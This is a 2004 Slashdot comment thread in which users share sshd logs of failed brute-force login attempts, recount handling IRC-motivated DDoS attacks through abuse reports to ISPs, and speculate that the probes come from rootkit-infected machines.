    by Bobzibub (20561) on Friday August 13, 2004 @10:08AM (#9958262)
    What the hell! Why not?

    Aug 12 05:08:28 pokey sshd[7534]: Illegal user test from ::ffff:203.186.65.92
    Aug 12 05:08:31 pokey sshd[7534]: Failed password for illegal user test from ::ffff:203.186.65.92 port 4570 ssh2
    Aug 12 10:51:33 pokey sshd[7615]: Illegal user test from ::ffff:217.115.83.1
    Aug 12 10:51:35 pokey sshd[7615]: Failed password for illegal user test from ::ffff:217.115.83.1 port 39378 ssh2
    Aug 12 10:51:39 pokey sshd[7617]: Illegal user guest from ::ffff:217.115.83.1
    Aug 12 10:51:41 pokey sshd[7617]: Failed password for illegal user guest from ::ffff:217.115.83.1 port 39462 ssh2
    Aug 12 10:51:48 pokey sshd[7619]: Illegal user admin from ::ffff:217.115.83.1
    Aug 12 10:51:50 pokey sshd[7619]: Failed password for illegal user admin from ::ffff:217.115.83.1 port 39609 ssh2
    Aug 12 10:51:54 pokey sshd[7621]: Illegal user admin from ::ffff:217.115.83.1
    Aug 12 10:51:57 pokey sshd[7621]: Failed password for illegal user admin from ::ffff:217.115.83.1 port 39742 ssh2
    Aug 12 10:52:01 pokey sshd[7623]: Illegal user user from ::ffff:217.115.83.1
    Aug 12 10:52:03 pokey sshd[7623]: Failed password for illegal user user from ::ffff:217.115.83.1 port 39878 ssh2
    Aug 12 10:52:10 pokey sshd[7625]: Failed password for root from ::ffff:217.115.83.1 port 40005 ssh2
    Aug 12 10:52:16 pokey sshd[7627]: Failed password for root from ::ffff:217.115.83.1 port 40145 ssh2
    Aug 12 10:52:23 pokey sshd[7629]: Failed password for root from ::ffff:217.115.83.1 port 40277 ssh2
    Aug 12 10:52:27 pokey sshd[7631]: Illegal user test from ::ffff:217.115.83.1
    Aug 12 10:52:29 pokey sshd[7631]: Failed password for illegal user test from ::ffff:217.115.83.1 port 40412 ssh2
    Aug 12 11:01:41 pokey sshd[7659]: Illegal user test from ::ffff:217.115.83.1
    Aug 12 11:01:44 pokey sshd[7659]: Failed password for illegal user test from ::ffff:217.115.83.1 port 49595 ssh2
    Aug 12 11:01:48 pokey sshd[7661]: Illegal user guest from ::ffff:217.115.83.1
    Aug 12 11:01:50 pokey sshd[7661]: Failed password for illegal user guest from ::ffff:217.115.83.1 port 49726 ssh2
    Aug 12 11:01:54 pokey sshd[7663]: Illegal user admin from ::ffff:217.115.83.1
    Aug 12 11:01:57 pokey sshd[7663]: Failed password for illegal user admin from ::ffff:217.115.83.1 port 49861 ssh2
    Aug 12 11:02:01 pokey sshd[7665]: Illegal user admin from ::ffff:217.115.83.1
    Aug 12 11:02:03 pokey sshd[7665]: Failed password for illegal user admin from ::ffff:217.115.83.1 port 49983 ssh2
    Aug 12 11:02:07 pokey sshd[7667]: Illegal user user from ::ffff:217.115.83.1
    Aug 12 11:02:10 pokey sshd[7667]: Failed password for illegal user user from ::ffff:217.115.83.1 port 50117 ssh2
    Aug 12 11:02:16 pokey sshd[7669]: Failed password for root from ::ffff:217.115.83.1 port 50257 ssh2
    Aug 12 11:02:22 pokey sshd[7671]: Failed password for root from ::ffff:217.115.83.1 port 50398 ssh2
    Aug 12 11:02:29 pokey sshd[7673]: Failed password for root from ::ffff:217.115.83.1 port 50546 ssh2
    Aug 12 11:02:33 pokey sshd[7675]: Illegal user test from ::ffff:217.115.83.1
    Aug 12 11:02:35 pokey sshd[7675]: Failed password for illegal user test from ::ffff:217.115.83.1 port 50678 ssh2
    Aug 12 12:23:19 pokey sshd[7703]: Illegal user test from ::ffff:202.129.52.50
    Aug 12 12:23:22 pokey sshd[7703]: Failed password for illegal user test from ::ffff:202.129.52.50 port 3258 ssh2
    Aug 12 12:23:26 pokey sshd[7705]: Illegal user guest from
  • by dougmc (70836) <dougmc+slashdot@frenzied.us> on Friday August 13, 2004 @11:30AM (#9959207) Homepage
    I've had problems with this a lot myself. Not intrusion attempts, but DDoS attacks. Apparantly people want my nickname on IRC, and think that hitting me with a DDoS attack until I drop off is an acceptable way of freeing it up for their own use. It's not so bad when they just go after my cable modem, but they've also gone after the place that I work at, even when I'm not IRCing from there at the time, and that's much much worse. Also, they often don't attack for the needed ten minutes -- I've had attacks going on for 15 hours, and perhaps even longer but at that point I had the ISP filter out the traffic for me.

    So, being a good guy, I never respond in kind (I could, but 1) it's wrong, 2) it affects more than just the target and 3) I don't feel like going to pound-me-in-the-ass prison), I just log every single packet I can, and when the attack is over find the worst offenders (typically the packets are not spoofed) and use Spamcop and whois to find the responsible parties for each one, and send them all an email.

    Many (most?) emails elicit an automatic response.

    Perhaps 10% get a personalized response, but usually this response says that I should contact the ISP of the offender (when in fact that's exactly what I'm doing.) Perhaps half of the responses I do get say they'll do something about it, which is good -- usually these are compromised drone/zombie machines, and need cleaning anyways.

    Quite often, the attacker is stupid enough to ping my machine from his home machine (so he can see how it's going), not thinking I'll notice that. When this happens, I can also email his home ISP, the people who really know who he is, and the people who can really hit him where it hurts. Except that they ignore my email too, and if they do email me back, they just tell me that the attack did not come from their ISP so they can't do anything, or there's no proof that the pinging is related to the attack.

    Phone calls are much more effective than emails, but you really need to make them during the attack for them to take them seriously. And often the attacks happen outside of business hours, so there's nobody to call. And they're very time consuming.

    Though I did succeed in nailing at least one guy. He was in Romania, and he messaged me a few weeks after the attack basically pleading with me that it wasn't him, but his brother using his computer. Apparantly the police (in Romania) were questioning him, and one of the things they showed him was my email. The police had never contacted me -- I'm guessing that my email was just one of many pieces of evidence they had against the guy. I felt a bit bad for him, but not that bad. Not that I had any control over what was happening to him at that point -- it was out of my hands the moment I sent my email.

    So, if it happens again, I'll do the same thing. I know it's not likely that anything substantial will come from my emails, but there's still a chance. Every time it happens, I know I nail at least some of his compromised machines, and have a chance at getting him. I'll win eventually -- either that, or he'll hit puberty, in which case we both win.

  • by argoff (142580) on Friday August 13, 2004 @11:52AM (#9959455)
    Chances are that you are not being directly hacked, but automatically probed by a system already infected with a root-kit installed.

    There are alot of people out there who have no idea that their computer is infected with a root-kit and many would be greatfull to be told so.

If you think the system is working, ask someone who's waiting for a prompt.

Working...